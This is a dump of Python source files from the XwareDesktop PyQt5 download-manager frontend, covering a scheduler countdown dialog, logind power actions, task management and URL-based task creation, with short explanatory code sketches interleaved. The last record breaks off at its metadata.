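Keeping the history as a fixed-size window is what lets the monitor draw a rolling speed graph without unbounded memory.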
{
"alpha_fraction": 0.5911853909492493,
"alphanum_fraction": 0.5992907881736755,
"avg_line_length": 31.899999618530273,
"blob_id": "ce5afc47dacf0707d5749828b6418991c65b085a",
"content_id": "a9c910a6ad3a96b876ef4a4373f9db23d6a3119d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2016,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 60,
"path": "/src/frontend/Schedule/SchedulerCountdown.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport logging\nfrom launcher import app\n\nfrom PyQt5.QtCore import QTimer, Qt, pyqtSlot\nfrom PyQt5.QtWidgets import QMessageBox\n\n\nclass CountdownMessageBox(QMessageBox):\n _timeout = None\n _timer = None\n _actionStr = None\n\n def __init__(self, actionStr):\n self._actionStr = actionStr\n super().__init__(QMessageBox.Question, # icon\n \"Xware Desktop任务完成\", # title\n \"\",\n QMessageBox.NoButton, # buttons\n getattr(app, \"mainWin\", None), # parent\n Qt.Dialog | Qt.WindowStaysOnTopHint)\n self.setAttribute(Qt.WA_DeleteOnClose)\n # Note: setting WindowModality cancels StaysOnTop\n # self.setWindowModality(Qt.ApplicationModal)\n\n # Due to a possible Qt Bug, the reject button must be added first.\n # https://bugreports.qt-project.org/browse/QTBUG-37870\n self.rejectBtn = self.addButton(\"取消\", QMessageBox.RejectRole)\n self.acceptBtn = self.addButton(\"立刻执行\", QMessageBox.AcceptRole)\n\n self._timeout = 60\n self.updateText()\n self._timer = QTimer(self)\n self._timer.timeout.connect(self.slotTick)\n self._timer.start(1000) # one tick per second\n\n @pyqtSlot()\n def slotTick(self):\n print(\"Scheduler countdown tick...\", self._timeout)\n if self._timeout > 0:\n self._timeout -= 1\n self.updateText()\n else:\n self.accept()\n\n def updateText(self):\n self.setText(\"任务已完成。将于{}秒后{}。\".format(self._timeout, self._actionStr))\n\n @pyqtSlot()\n def accept(self):\n print(\"Scheduler confirmation accepted\")\n app.scheduler.sigActionConfirmed.emit(True) # act\n super().accept()\n\n @pyqtSlot()\n def reject(self):\n print(\"Scheduler confirmation rejected\")\n app.scheduler.sigActionConfirmed.emit(False) # reset\n super().reject()\n"
},
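The `CountdownMessageBox` in the record above drives its auto-confirm with a `QTimer` firing once per second. A stripped-down, self-contained sketch of that countdown pattern (PyQt5 required; the 5-second timeout and message text are illustrative, not from the project):

```python
# Sketch of a QTimer-driven countdown dialog, as in CountdownMessageBox above.
import sys
from PyQt5.QtCore import QTimer, pyqtSlot
from PyQt5.QtWidgets import QApplication, QMessageBox

class Countdown(QMessageBox):
    def __init__(self, timeout=5):  # example timeout, in seconds
        super().__init__()
        self._timeout = timeout
        self._timer = QTimer(self)
        self._timer.timeout.connect(self.tick)
        self._timer.start(1000)  # one tick per second
        self.refresh()

    @pyqtSlot()
    def tick(self):
        if self._timeout > 0:
            self._timeout -= 1
            self.refresh()
        else:
            self.accept()  # auto-confirm when the countdown expires

    def refresh(self):
        self.setText("Acting in {} second(s)...".format(self._timeout))

if __name__ == "__main__":
    app = QApplication(sys.argv)
    box = Countdown()
    box.show()
    sys.exit(app.exec())
```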
{
"alpha_fraction": 0.6213592290878296,
"alphanum_fraction": 0.6601941585540771,
"avg_line_length": 19.600000381469727,
"blob_id": "0c74916aab451c2280bfe06a4b59ea00a3625f05",
"content_id": "36c2c54fe773c9c307901aac396d59f3fe34b6fd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 206,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 10,
"path": "/src/shared/__init__.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport logging\n\n__version__ = \"0.11\"\n\nXWARE_VERSION = \"1.0.27\"\n\nfrom collections import namedtuple\nBackendInfo = namedtuple(\"BackendInfo\", [\"etmPid\", \"lcPort\", \"userId\", \"peerId\"])\n"
},
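`BackendInfo` in the record above is the entire IPC payload the daemon reports to the frontend (see `interface_infoPoll` in `xwared.py` further down). For reference, the namedtuple pattern with made-up values:

```python
# Illustration of the BackendInfo namedtuple above; the values are samples.
from collections import namedtuple

BackendInfo = namedtuple("BackendInfo", ["etmPid", "lcPort", "userId", "peerId"])

# Field access by name keeps the IPC payload self-describing.
info = BackendInfo(etmPid=1234, lcPort=9000, userId=0, peerId="")
print(info.etmPid, info._asdict())
```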
{
"alpha_fraction": 0.5719636082649231,
"alphanum_fraction": 0.5751739144325256,
"avg_line_length": 31.224138259887695,
"blob_id": "fbe8ff23028bebde759e5d9077e664e1efa29a32",
"content_id": "35cd444693583100857c11c1a1aba1d488cfac6b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3760,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 116,
"path": "/src/frontend/Schedule/PowerAction.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport logging\nfrom launcher import app\n\nfrom PyQt5.QtCore import QObject\nfrom PyQt5.QtDBus import QDBusConnection, QDBusInterface\n\nimport os\n\n_DBUS_POWER_SERVICE = \"org.freedesktop.login1\"\n_DBUS_POWER_PATH = \"/org/freedesktop/login1\"\n_DBUS_POWER_INTERFACE = \"org.freedesktop.login1.Manager\"\n\nACTION_NONE = 0\nACTION_POWEROFF = 1\nACTION_HYBRIDSLEEP = 2\nACTION_HIBERNATE = 3\nACTION_SUSPEND = 4\n\n\nclass PowerAction(object):\n # defines a power action\n manager = None\n actionId = None\n displayName = None\n internalName = None\n availability = None\n command = None\n\n def __init__(self, manager, actionId, displayName, internalName):\n super().__init__()\n self.manager = manager\n self.actionId = actionId\n self.displayName = displayName\n self.internalName = internalName\n\n if self.actionId == ACTION_NONE:\n # always allow doing nothing\n availability = \"yes\"\n command = None\n else:\n optionKey = self.internalName.lower() + \"cmd\"\n if app.settings.has(\"scheduler\", optionKey):\n # override action with command\n availability = \"cmd\"\n command = app.settings.get(\"scheduler\", optionKey)\n # TODO: check if the command is bad.\n else:\n # use the default action, namely logind.\n # needs to check for availability\n msg = self.manager._interface.call(\"Can\" + self.internalName)\n availability = msg.arguments()[0]\n command = None\n\n self.availability = availability\n self.command = command\n\n def __repr__(self):\n contents = [\n \"{}({})\".format(self.internalName, self.actionId),\n self.availability,\n ]\n if self.command is not None:\n contents.append(self.command)\n\n return \"{cls}<{contents}>\".format(\n cls = self.__class__.__name__,\n contents = \":\".join(contents))\n\n\nclass PowerActionManager(QObject):\n # manages power actions, and act them.\n _conn = None\n _interface = None\n actions = None\n\n def __init__(self, parent = None):\n super().__init__(parent)\n self._conn = QDBusConnection(\"Xware Desktop\").systemBus()\n self._interface = QDBusInterface(_DBUS_POWER_SERVICE,\n _DBUS_POWER_PATH,\n _DBUS_POWER_INTERFACE,\n self._conn)\n\n self.actions = (\n PowerAction(self, ACTION_NONE, \"无\", \"None\"),\n PowerAction(self, ACTION_POWEROFF, \"关机\", \"PowerOff\"),\n PowerAction(self, ACTION_HYBRIDSLEEP, \"混合休眠\", \"HybridSleep\"),\n PowerAction(self, ACTION_HIBERNATE, \"休眠\", \"Hibernate\"),\n PowerAction(self, ACTION_SUSPEND, \"睡眠\", \"Suspend\"),\n )\n logging.info(self.actions)\n\n def getActionById(self, actionId):\n return self.actions[actionId]\n\n def act(self, actionId):\n action = self.getActionById(actionId)\n if action.command:\n return self._cmdAct(action)\n elif action.availability == \"yes\":\n return self._dbusAct(action)\n raise Exception(\"Unhandled {}\".format(action))\n\n def _dbusAct(self, action):\n logging.info(\"scheduler is about to act: {}\".format(action))\n msg = self._interface.call(action.internalName,\n False)\n if msg.errorName():\n logging.error(msg.errorMessage())\n\n @staticmethod\n def _cmdAct(action):\n logging.info(\"scheduler is about to execute: {}\".format(action))\n os.system(action.command)\n"
},
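`PowerAction` in the record above probes logind by calling the D-Bus method `Can<Action>` (e.g. `CanPowerOff`) and reading the first argument of the reply. A condensed sketch of that availability check; it assumes a Linux session with systemd-logind and a reachable system bus:

```python
# Sketch: ask logind whether a power action is available, as PowerAction does.
# Requires PyQt5 QtDBus and a running system bus (Linux with systemd-logind).
import sys
from PyQt5.QtCore import QCoreApplication
from PyQt5.QtDBus import QDBusConnection, QDBusInterface

app = QCoreApplication(sys.argv)
iface = QDBusInterface("org.freedesktop.login1",
                       "/org/freedesktop/login1",
                       "org.freedesktop.login1.Manager",
                       QDBusConnection.systemBus())

# logind answers "yes", "no", "challenge", or "na".
reply = iface.call("CanPowerOff")
print(reply.arguments()[0])
```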
{
"alpha_fraction": 0.6732240319252014,
"alphanum_fraction": 0.6765027046203613,
"avg_line_length": 27.59375,
"blob_id": "1dd848e80bfc58ced15df1272ca2e07e17677f11",
"content_id": "93393a57a1704947a51882b46416bf683d7fdd62",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 923,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 32,
"path": "/src/frontend/Schedule/SchedulerButton.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport logging\nfrom launcher import app\n\nfrom PyQt5.QtCore import pyqtSlot\nfrom PyQt5.QtGui import QIcon\n\nfrom Schedule.SchedulerWin import SchedulerWindow\nfrom CustomStatusBar.CStatusButton import CustomStatusBarButton\n\n\nclass SchedulerButton(CustomStatusBarButton):\n def __init__(self, parent):\n super().__init__(parent)\n self.setIcon(QIcon(\":/image/clock.png\"))\n self.updateText()\n app.scheduler.sigSchedulerSummaryUpdated.connect(self.updateText)\n self.clicked.connect(self.slotClicked)\n\n @pyqtSlot()\n def slotClicked(self):\n app.mainWin.schedulerWin = SchedulerWindow(app.mainWin)\n app.mainWin.schedulerWin.show()\n\n def updateText(self):\n summary = app.scheduler.getSummary()\n if type(summary) is str:\n self.setText(summary)\n else:\n # True / False\n self.setText(\"计划任务\")\n"
},
{
"alpha_fraction": 0.637686550617218,
"alphanum_fraction": 0.6399253606796265,
"avg_line_length": 34.26315689086914,
"blob_id": "4109e5b2b08c935a4023ef93b772861e5958132f",
"content_id": "518321faaf3974c2649feb7b3060dcad7fb52aa4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2680,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 76,
"path": "/src/frontend/Schedule/SchedulerWin.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport logging\nfrom launcher import app\n\nfrom PyQt5.QtCore import pyqtSlot, Qt\nfrom PyQt5.QtWidgets import QDialog, QListWidgetItem\n\nfrom .ui_scheduler import Ui_Dialog\nimport Schedule\n\n\nclass SchedulerWindow(QDialog, Ui_Dialog):\n scheduler = None\n\n def __init__(self, parent = None):\n super().__init__(parent)\n self.setupUi(self)\n self.setAttribute(Qt.WA_DeleteOnClose)\n\n self.scheduler = app.scheduler\n self.loadFromScheduler()\n\n def loadFromScheduler(self):\n # actWhen ComboBox\n for row, pair in enumerate(self.scheduler.POSSIBLE_ACTWHENS):\n self.comboBox_actWhen.addItem(pair[1])\n self.comboBox_actWhen.setItemData(row, pair[0])\n\n self.slotActWhenChanged(self.scheduler.actWhen)\n self.comboBox_actWhen.setCurrentIndex(self.scheduler.actWhen)\n self.comboBox_actWhen.activated[int].connect(self.slotActWhenChanged)\n\n # tasks list\n runningTasks = app.etmpy.runningTasksStat.getTasks()\n waitingTaskIds = self.scheduler.waitingTaskIds\n for rTaskId, rTask in runningTasks.items():\n item = QListWidgetItem(rTask[\"name\"])\n item.setData(Qt.UserRole, rTaskId)\n self.listWidget_tasks.addItem(item)\n\n # must be set before being added\n if rTaskId in waitingTaskIds:\n item.setSelected(True)\n else:\n item.setSelected(False)\n\n # action comboBox\n selectedIndex = None\n for action in self.scheduler.actions:\n if action.command or action.availability == \"yes\":\n self.comboBox_action.addItem(action.displayName)\n row = self.comboBox_action.count() - 1\n self.comboBox_action.setItemData(row, action.actionId)\n if self.scheduler.actionId == action.actionId:\n selectedIndex = row\n self.comboBox_action.setCurrentIndex(selectedIndex)\n\n @pyqtSlot(int)\n def slotActWhenChanged(self, choice):\n if choice == Schedule.ALL_TASKS_COMPLETED:\n self.listWidget_tasks.setEnabled(False)\n elif choice == Schedule.SELECTED_TASKS_COMPLETED:\n self.listWidget_tasks.setEnabled(True)\n else:\n raise Exception(\"Unknown Scheduler actWhen\")\n\n @pyqtSlot()\n def accept(self):\n actWhen = self.comboBox_actWhen.currentData()\n taskIds = set(map(lambda item: item.data(Qt.UserRole),\n self.listWidget_tasks.selectedItems()))\n actionId = self.comboBox_action.currentData()\n\n self.scheduler.set(actWhen, taskIds, actionId)\n self.close()\n"
},
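`SchedulerWindow.loadFromScheduler` in the record above attaches an id to each combo-box row with `setItemData` and reads it back in `accept` with `currentData`, so the UI never has to map display strings back to ids. A minimal standalone illustration (the rows are arbitrary examples):

```python
# Sketch of the setItemData/currentData pattern used in SchedulerWin above.
import sys
from PyQt5.QtWidgets import QApplication, QComboBox

app = QApplication(sys.argv)
combo = QComboBox()
for row, (action_id, label) in enumerate([(0, "None"), (1, "PowerOff")]):
    combo.addItem(label)
    combo.setItemData(row, action_id)  # store the id, not the display text

combo.setCurrentIndex(1)
print(combo.currentData())  # -> 1, the attached action id
```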
{
"alpha_fraction": 0.7797619104385376,
"alphanum_fraction": 0.7857142686843872,
"avg_line_length": 27,
"blob_id": "b217ff55bfab3aab6e5d5629cf930fb20f3d4960",
"content_id": "cc9bcc0903486b770374d4cb91b2ef7843aaa1fe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 168,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 6,
"path": "/src/frontend/Settings/__init__.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nfrom .menu import SettingMenu\nfrom .accessor import SettingsAccessor\nfrom .defaults import DEFAULT_SETTINGS\nfrom .dialog import SettingsDialog\n"
},
{
"alpha_fraction": 0.6666666865348816,
"alphanum_fraction": 0.6705653071403503,
"avg_line_length": 29.176469802856445,
"blob_id": "11e077d46b99fcb3a55adcaafd76ddb01bcc2a68",
"content_id": "2840f8036b20394e21d1365e836ef35b5aafe21d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 513,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 17,
"path": "/src/frontend/Settings/accessor.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport logging\nfrom launcher import app\n\nfrom PyQt5.QtCore import pyqtSignal, QObject\nfrom shared.config import SettingsAccessorBase\n\n\nclass SettingsAccessor(QObject, SettingsAccessorBase):\n applySettings = pyqtSignal()\n\n def __init__(self, parent, configFilePath, defaultDict):\n super().__init__(QObject_parent = parent,\n configFilePath = configFilePath,\n defaultDict = defaultDict)\n app.aboutToQuit.connect(self.save)\n"
},
{
"alpha_fraction": 0.671875,
"alphanum_fraction": 0.6875,
"avg_line_length": 20.33333396911621,
"blob_id": "42bd41c15b0b3e25e3d7a3afabd1a807be9c2384",
"content_id": "a7e0fbd95e0c8d416ea248e877c841f730c77feb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 64,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 3,
"path": "/src/frontend/Widgets/__init__.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nfrom .QuickView import CustomQuickView\n"
},
{
"alpha_fraction": 0.5850815773010254,
"alphanum_fraction": 0.5888111591339111,
"avg_line_length": 29.863309860229492,
"blob_id": "c5a85bd1af907f625d221c927d24179cdbc99280",
"content_id": "95541efa236cdbd5ed4d075f43ed81cb21fc2981",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4290,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 139,
"path": "/src/frontend/models/TaskManager.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\n# -*- coding: utf-8 -*-\n\nimport asyncio\nimport collections\nfrom functools import partial\nfrom itertools import islice\n\nfrom PyQt5.QtCore import QModelIndex\n\n\nclass TaskManager(collections.MutableMapping):\n def __init__(self, model):\n self._mapNamespaces = collections.defaultdict(list) # {\"xware-0123\": [0, 1, 2, 3], ...}\n self._stash = {}\n self._maps = []\n self._model = model\n\n # Disable some methods that are expected in a dict.\n def __setitem__(self, key, value):\n raise NotImplementedError()\n\n def __delitem__(self, key):\n raise NotImplementedError()\n\n def copy(self):\n raise NotImplementedError()\n\n def keys(self):\n raise NotImplementedError()\n\n def values(self):\n raise NotImplementedError()\n\n def items(self):\n raise NotImplementedError()\n\n def __getitem__(self, key):\n # faster than ChainMap's implementation\n ns = key.split(\"|\")[0]\n for nsmap in self._mapsForNamespace(ns):\n try:\n result = nsmap[key]\n return result\n except KeyError:\n pass\n raise KeyError(\"key {} cannot be found.\".format(key))\n\n def __iter__(self):\n for map_ in self._maps:\n yield from map_\n\n def __len__(self):\n return sum(map(len, self._maps))\n\n def __contains__(self, key):\n # faster than ChainMap's implementation\n ns = key.split(\"|\")[0]\n return any(key in nsmap for nsmap in self._mapsForNamespace(ns))\n\n # Custom implementation\n def _mapsForNamespace(self, ns):\n return (self._maps[mapId] for mapId in self._mapNamespaces[ns])\n\n def _baseIndexForMap(self, mapId):\n assert mapId <= len(self._maps)\n return sum(map(len, self._maps[:mapId]))\n\n def at(self, index: \"uint\"):\n assert index >= 0, \"index = {}\".format(index)\n for mapId in range(len(self._maps)):\n mapLIndex = self._baseIndexForMap(mapId)\n mapRIndex = mapLIndex + len(self._maps[mapId]) - 1\n if mapRIndex >= index:\n inmapIndex = index - mapLIndex\n itr = islice(self._maps[mapId].values(), inmapIndex, inmapIndex + 1)\n result = next(itr)\n return result\n raise IndexError(\"Out of range: index({})\".format(index))\n\n @asyncio.coroutine\n def appendMap(self, map_):\n # All tasks from all backends live in a same chainmap, therefore id needs to be prefixed\n\n if not isinstance(map_, collections.OrderedDict):\n raise ValueError(\"Can only register OrderedDict\")\n\n namespace = getattr(map_, \"adapter\").namespace\n if not namespace:\n raise ValueError(\"Map must have a namespace property\")\n\n assert not bool(map_), \"Map must be empty before registering\"\n\n mapId = len(self._maps)\n self._maps.append(map_)\n\n # implement map's model related methods\n map_.beforeInsert = partial(self.beforeInsert, mapId)\n map_.afterInsert = self.afterInsert\n map_.beforeDelete = partial(self.beforeDelete, mapId)\n map_.moveToStash = self.moveToStash\n map_.afterDelete = self.afterDelete\n\n self._mapNamespaces[namespace].append(mapId)\n return mapId\n\n def updateMap(self, mapId, updating):\n self._maps[mapId].updateData(updating)\n\n def beforeInsert(self, mapId, key) -> {False: \"deferred\",\n True: \"goahead\",\n \"item\": \"Found key in stash\"}:\n if key in self:\n print(\"deferred\", key)\n return False\n baseIndex = self._baseIndexForMap(mapId)\n size = len(self._maps[mapId])\n i = baseIndex + size\n\n self._model.sigBeforeInsert.emit(i)\n\n return self._stash.pop(key, True)\n\n def afterInsert(self):\n self._model.sigAfterInsert.emit()\n\n def beforeDelete(self, mapId, index):\n baseIndex = self._baseIndexForMap(mapId)\n i = baseIndex + index\n\n 
self._model.beginRemoveRows(QModelIndex(), i, i)\n return True\n\n def moveToStash(self, item):\n self._stash[item.id] = item\n\n def afterDelete(self):\n self._model.endRemoveRows()\n"
},
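`TaskManager.at` in the record above treats several per-backend `OrderedDict`s as one flat, indexable sequence: it sums the lengths of the maps that precede the hit, then slices into the right map with `islice`. The core arithmetic, reduced to plain Python:

```python
# Sketch of TaskManager.at(): index into several OrderedDicts as one sequence.
from collections import OrderedDict
from itertools import islice

maps = [OrderedDict(a=1, b=2), OrderedDict(c=3)]  # sample per-backend maps

def at(index):
    base = 0
    for m in maps:
        if index < base + len(m):
            # islice avoids materializing the whole values() view.
            return next(islice(m.values(), index - base, index - base + 1))
        base += len(m)
    raise IndexError(index)

assert [at(i) for i in range(3)] == [1, 2, 3]
```

This is what lets a single Qt model row index address tasks that actually live in different adapters.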
{
"alpha_fraction": 0.6769230961799622,
"alphanum_fraction": 0.692307710647583,
"avg_line_length": 20.66666603088379,
"blob_id": "5012141a5a3a9fee48658c67fb41de12e45cf108",
"content_id": "f6e7b25d023b659055c458b9060a097c6b5197a4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 65,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 3,
"path": "/src/frontend/libxware/__init__.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nfrom .adapter import XwareAdapterThread\n"
},
{
"alpha_fraction": 0.621728777885437,
"alphanum_fraction": 0.6308485269546509,
"avg_line_length": 31.753246307373047,
"blob_id": "dc59cdb3d3ac638989258bf3e598b677bac89b20",
"content_id": "fd00ea279ff8aa7ccd1b1116865b948328e42fb5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2522,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 77,
"path": "/src/frontend/morula.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport os, sys\nsys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), \"../\"))\n\nfrom PyQt5.QtCore import QUrl, QSize\nfrom PyQt5.QtQuick import QQuickView\nfrom PyQt5.QtGui import QGuiApplication\n\nfrom Widgets import CustomQuickView\n\nimport constants\n\n\nclass QmlMain(CustomQuickView):\n def __init__(self, parent):\n super().__init__(parent)\n app = QGuiApplication.instance()\n\n self.setTitle(\"Xware Desktop with QML (experimental)\")\n self.setResizeMode(QQuickView.SizeRootObjectToView)\n self.qmlUrl = QUrl.fromLocalFile(os.path.join(constants.FRONTEND_DIR, \"QML/Main.qml\"))\n self.rootContext().setContextProperty(\"adapters\", app.adapterManager)\n self.rootContext().setContextProperty(\"taskModel\", app.proxyModel)\n self.setSource(self.qmlUrl)\n self.resize(QSize(800, 600))\n\n\nclass DummyApp(QGuiApplication):\n def __init__(self, *args):\n super().__init__(*args)\n\n from models import TaskModel, AdapterManager, ProxyModel\n from libxware import XwareAdapterThread\n\n self.taskModel = TaskModel()\n self.proxyModel = ProxyModel()\n self.proxyModel.setSourceModel(self.taskModel)\n\n self.adapterManager = AdapterManager()\n self.xwareAdapterThread = XwareAdapterThread({\n \"host\": \"127.0.0.1\",\n \"port\": 9000,\n })\n self.xwareAdapterThread.start()\n\n self.qmlWin = QmlMain(None)\n self.qmlWin.show()\n\nfrom PyQt5.QtCore import QtMsgType, QMessageLogContext, QtDebugMsg, QtWarningMsg, QtCriticalMsg, \\\n QtFatalMsg\n\n\ndef installQtMsgHandler(msgType: QtMsgType, context: QMessageLogContext, msg: str):\n strType = {\n QtDebugMsg: \"DEBUG\",\n QtWarningMsg: \"WARN\",\n QtCriticalMsg: \"CRITICAL\",\n QtFatalMsg: \"FATAL\"\n }[msgType]\n\n print(\"Qt[{strType}] {category} {function} in {file}, on line {line}\\n\"\n \" {msg}\".format(strType = strType,\n category = context.category,\n function = context.function,\n file = context.file,\n line = context.line,\n msg = msg),\n file = sys.stdout if msgType in (QtDebugMsg, QtWarningMsg) else sys.stderr)\n\n\nif __name__ == \"__main__\":\n from PyQt5.QtCore import qInstallMessageHandler\n qInstallMessageHandler(installQtMsgHandler)\n app = DummyApp(sys.argv)\n sys.exit(app.exec())\n"
},
{
"alpha_fraction": 0.6151692271232605,
"alphanum_fraction": 0.6177144050598145,
"avg_line_length": 30.43199920654297,
"blob_id": "bbe5bdbd807396552f4d930a5cee5f9390901cf2",
"content_id": "66989dc5e13f39643f73c4e2e88f56dc2a892a06",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3929,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 125,
"path": "/src/frontend/Tasks/action.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport logging\nfrom launcher import app\n\nfrom PyQt5.QtCore import QObject, pyqtSlot\n\nimport sys\nfrom urllib import parse\n\nfrom frontendpy import FrontendAction\nfrom utils import misc\nfrom .mimeparser import UrlExtractor\nfrom .watchers.clipboard import ClipboardWatcher\nfrom .watchers.commandline import CommandlineWatcher\n\n\nclass CreateTasksAction(FrontendAction):\n _tasks = None # tasks to add in the same batch\n\n def __init__(self, tasks):\n super().__init__()\n self._tasks = tasks\n\n def __repr__(self):\n return \"{} {}\".format(self.__class__.__name__, self._tasks)\n\n def consume(self):\n taskUrls = list(map(lambda task: task.url, self._tasks))\n if self._tasks[0].kind == CreateTask.NORMAL:\n app.frontendpy.sigCreateTasks.emit(taskUrls)\n else:\n app.mainWin.page.overrideFile = taskUrls[0]\n app.frontendpy.sigCreateTaskFromTorrentFile.emit()\n\n\nclass CreateTask(object):\n NORMAL = 0\n LOCAL_TORRENT = 1\n\n url = None\n kind = None\n\n def __init__(self, url = None, kind = None):\n self.url = url\n\n if kind is None:\n kind = self.NORMAL\n self.kind = kind\n\n def __repr__(self):\n return \"{} <{}>\".format(self.__class__.__name__, self.url)\n\n\nclass TaskCreationAgent(QObject):\n _urlExtractor = None\n\n def __init__(self, parent = None):\n super().__init__(parent)\n # hold a reference to the parent, aka frontendpy.\n # when the program is launched, app.frontendpy would be None.\n self._frontendpy = parent\n tasks = sys.argv[1:]\n if tasks:\n self.createTasksAction(tasks)\n\n self._urlExtractor = UrlExtractor(self)\n app.sigMainWinLoaded.connect(self.connectUI)\n\n # load watchers\n self._clipboardWatcher = ClipboardWatcher(self)\n self._commandlineWatcher = CommandlineWatcher(self)\n\n @pyqtSlot()\n def connectUI(self):\n app.mainWin.action_createTask.triggered.connect(self.createTasksAction)\n\n def createTasksFromMimeData(self, data):\n # This method only checks text data.\n urls = self._urlExtractor.extract(data.text())\n if len(urls) > 0:\n self.createTasksAction(urls)\n\n @pyqtSlot()\n @pyqtSlot(list)\n def createTasksAction(self, taskUrls = None):\n if taskUrls:\n alltasks = self._filterInvalidTasks(map(self._createTask, taskUrls))\n tasks = list(filter(lambda task: task.kind == CreateTask.NORMAL, alltasks))\n tasks_localtorrent = list(filter(lambda task: task.kind == CreateTask.LOCAL_TORRENT,\n alltasks))\n else:\n # else\n tasks = self._filterInvalidTasks([self._createTask()])\n tasks_localtorrent = []\n\n if tasks:\n self._frontendpy.queueAction(CreateTasksAction(tasks))\n for task_bt in tasks_localtorrent: # because only 1 bt-task can be added once.\n self._frontendpy.queueAction(CreateTasksAction([task_bt]))\n\n @staticmethod\n def _filterInvalidTasks(tasks):\n # remove those urls which were not recognized by self._createTask\n return list(filter(lambda t: t is not None, tasks))\n\n @staticmethod\n def _createTask(taskUrl = None):\n if taskUrl is None:\n return CreateTask()\n\n if taskUrl.startswith(\"file://\"):\n taskUrl = taskUrl[len(\"file://\"):]\n\n parsed = parse.urlparse(taskUrl)\n if parsed.scheme in (\"thunder\", \"flashget\", \"qqdl\"):\n url = misc.decodePrivateLink(taskUrl)\n return CreateTask(url)\n\n elif parsed.scheme == \"\":\n if parsed.path.endswith(\".torrent\"):\n return CreateTask(taskUrl, kind = CreateTask.LOCAL_TORRENT)\n\n elif parsed.scheme in (\"http\", \"https\", \"ftp\", \"magnet\", \"ed2k\"):\n return CreateTask(taskUrl)\n"
},
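`TaskCreationAgent._createTask` in the record above classifies an incoming URL by scheme before deciding how to queue it. The dispatch logic in isolation (decoding `thunder://`-style private links uses the project's own `misc.decodePrivateLink`, which is not reproduced here):

```python
# Sketch of the scheme dispatch in TaskCreationAgent._createTask above.
from urllib import parse

def classify(task_url):
    if task_url.startswith("file://"):
        task_url = task_url[len("file://"):]
    parsed = parse.urlparse(task_url)
    if parsed.scheme in ("thunder", "flashget", "qqdl"):
        return "private-link"   # would be decoded, then queued as normal
    if parsed.scheme == "" and parsed.path.endswith(".torrent"):
        return "local-torrent"  # queued one at a time, via the file override
    if parsed.scheme in ("http", "https", "ftp", "magnet", "ed2k"):
        return "normal"
    return None  # unrecognized; filtered out by _filterInvalidTasks

assert classify("/tmp/a.torrent") == "local-torrent"
assert classify("http://example.com/f.iso") == "normal"
```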
{
"alpha_fraction": 0.5785833597183228,
"alphanum_fraction": 0.5820415019989014,
"avg_line_length": 33.228572845458984,
"blob_id": "34e99b7315d4ad7cf7fcd4c89348996ff10ac1cf",
"content_id": "99966be937120bde14344aa06600984330ee9090",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8532,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 245,
"path": "/src/daemon/xwared.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
